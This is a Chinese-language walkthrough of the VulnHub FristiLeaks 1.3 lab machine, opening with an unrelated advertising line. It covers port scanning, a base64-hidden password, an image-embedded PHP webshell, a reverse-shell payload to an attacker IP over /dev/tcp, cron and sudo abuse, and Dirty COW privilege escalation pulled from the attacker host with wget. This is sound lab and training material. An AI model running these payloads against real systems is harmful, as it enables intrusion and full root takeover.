网站与备案信息不符长沙全网覆盖的网络推广
*VulnHub-FristiLeaks:1.3暴力解法、细节解法,主打软硬都吃,隧道搭建、寻找exp、提权、只要你想没有做不到的姿势
一、信息收集
1、扫靶机ip
经典第一步,扫一下靶机ip
arp-scan -l
扫描同网段
nmap -sP 192.168.122.0/24
2、指纹扫描、端口
nmap -sV -O -p 1-65535 192.168.122.128
nmap -sS -sV 192.168.122.128
nmap -p- -sV -A 192.168.122.128
whatweb -v 192.168.122.128
只扫出了一个端口,估计要跟网页打交道了,这里有个php5.3.3留意一下,可能有说法
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
3、访问80端口
一个登录页面,尝试尝试sql和弱口令,因该是登录不了
这个页面的源代码有这样看着像加密的数据,我们去尝试尝试解码一下
base64解密一下看着像一张图片,解码是乱码,我们用kali去转化一下
base64 -d base64.txt > base64.png
这里原来是密码,账户名是作者名字
因该是文件上传了,可以做一个后门文件丢进去然后拿蚁剑、冰蝎连一下。
❝这里介绍一下如何制作图片木马
1、cmd命令将php的内容添加到png中生成新的png
copy /b 1.jpg + 1.php muma.png
这里1.jpg是源图片,1.php是木马文件,最后muma.png就是我们生成的图片马
然后这里蚁剑也是能连上的,可以在蚁剑上弹shell
这里蚁剑开终端还是挺舒服的
这里貌似是一个漏洞,先查看一下内核版本吧
这里是找到了一些提示,说实话这个因该是翻译问题,看的我很眩晕,大概意思说把runthis文件丢进tmp里,然后runthis里的命令每一分钟都会以他的账户运行
我们输入echo “/home/admin/chmod 777 /home/admin” > /tmp/runthis就能访问admin了
4、建立隧道,蚁剑、冰蝎、nc(瑞士军刀)
首先我们在kali终端建立一个nc监听
这里丢了一个phpinfo.php.gif是可以访问的,想说一点就是有时候连接可能会失败,总有一些莫名原因,这时候我们能做的就是不断尝试,不断试错。还有耐心,patience is the key in life。
我们也拿到了一个apache的权限
<?php system("bash -c 'sh -i &>/dev/tcp/192.168.66.129/6666 0>&1'");?>
这段代码就是我们放入a.php.png里面的语句,是一个反连语句,就是让靶机的bash创建一个shell给我们,给到我们的攻击机
5、提权
2025.3.6 AM: 10:49
方法一:python脚本
这里总结一下第二个方法,个人觉得这个方法应该是顺着作者方法进行的,因为靶机会提示你并给你引导至python脚本那一块,但是两种方式都可以,毕竟内核版本太老了 这里我们还是用kali来提权,蚁剑还是不太方便,用蚁剑vim时候不回显,不知道是不是shell不完整的问题。
两个解码出来LetThereBeFristi!和thisisalsopw123,根据之前看到的脚本whoisyourgodnow,大概能确定sudo账户是fristigod尝试登录 这里提到的权限是fristigod
这张图片在别的师傅哪儿是提示出来的,但是我这儿没有,可能是我已经提权到了还是怎么着,他告诉我们有一个root权限的文件夹,路径也给我们了,直接塞一个提权命令就可以了。这个root是任何命令都以root权限执行 旁边有个日志文件,但是可能是我这个靶机不完整,应该是有一个flag的,但是我只需要提权就完成了
sudo -u fristi ./doCom /bin/bash -p
用fristi用户执行doCom文件,然后让bash开一个新的shell,这样我们就能完成提权了,不过为什么不是root用户,是因为我使用过脏牛提权了,留下了一个管理员账户,但是id=0就已经是管理员组了
这里就是系统管理员了,就是利用这个root用户运行的doCom就能提权了
这里也是给大家找了个小彩蛋,虽然我是打靶机的,但是这道题原本应该是ctf题,挺变态的,出这种难度,说实话,这作者还挺自恋的哈。
这个作者让我花了一天时间,我觉得把flag改成下面的会更好
2025.3.6 AM: 11:28
方法二:脏牛提权,寻找exp.
uname -a
我们查看一下内核信息
靶机版本信息:Linux 2.6.32-573.8.1.el6.x86_64 这里看版本信息因该是可以使用
影响范围:Linux内核版本2.6.22(2007年发布)至修复前版本(2016年10月修复),包括CentOS、Ubuntu、Android等系统searchsploit linux 2.6.32 Privilege
寻找linux的exp或者去github下一个脏牛exp
这个还有教程,尝试一下这个exp。
1、首先开python或者apache2
python -m http.server 80
service apache2 start2、靶机下载脏牛的c语言脚本
wget http://192.168.66.129/dirty.c3、用gcc编译脏牛(dirty.c)名为exp
gcc -pthread dirty.c -o exp -lcrypt4、修复shell,因为这里shell是不完整的,大概运行到第5步会提示你
python -c 'import pty;pty.spawn("/bin/bash")'5、运行,这里是自己设置密码,账户就是exp作者给你的
./exp 1234566、提权
su firefart
123456
然后敲回车
最后用这个账户就能登陆了,密码就是你自己设置的
这里kali出毛病了疯狂报错,整个上午全在调试最后也是尝试出来了,很多雷区,师傅们打这个靶机时候小心一点。
到这里人已经眩晕了,我本想着今天打两台靶机的,但是先在是18:30了,吃饭去了。肝不动了。如果有师傅遇到问题问就可以了,虽然我这瓜不保甜,但我尽力